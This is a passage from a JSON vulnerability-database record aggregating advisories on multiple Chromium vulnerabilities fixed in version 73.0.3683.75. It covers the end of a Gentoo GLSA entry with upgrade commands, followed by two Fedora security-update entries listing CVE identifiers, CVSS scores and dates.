\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-73.0.3683.75\"", "edition": 1, "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "GLSA-201903-23", "href": "https://security.gentoo.org/glsa/201903-23", "title": "Chromium: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5784", "CVE-2019-5786", "CVE-2019-5787", "CVE-2019-5788", "CVE-2019-5789", "CVE-2019-5790", "CVE-2019-5791", "CVE-2019-5792", "CVE-2019-5793", "CVE-2019-5794", "CVE-2019-5795", "CVE-2019-5796", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5799", "CVE-2019-5800", "CVE-2019-5801", "CVE-2019-5802", "CVE-2019-5803", "CVE-2019-5804"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). 
", "modified": "2019-03-29T19:41:48", "published": "2019-03-29T19:41:48", "id": "FEDORA:3240460C5991", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: chromium-73.0.3683.75-2.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5784", "CVE-2019-5786", "CVE-2019-5787", "CVE-2019-5788", "CVE-2019-5789", "CVE-2019-5790", "CVE-2019-5791", "CVE-2019-5792", "CVE-2019-5793", "CVE-2019-5794", "CVE-2019-5795", "CVE-2019-5796", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5799", "CVE-2019-5800", "CVE-2019-5801", "CVE-2019-5802", "CVE-2019-5803", "CVE-2019-5804"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2019-03-25T06:10:55", "published": "2019-03-25T06:10:55", "id": "FEDORA:906EB6076D01", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: chromium-73.0.3683.75-2.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}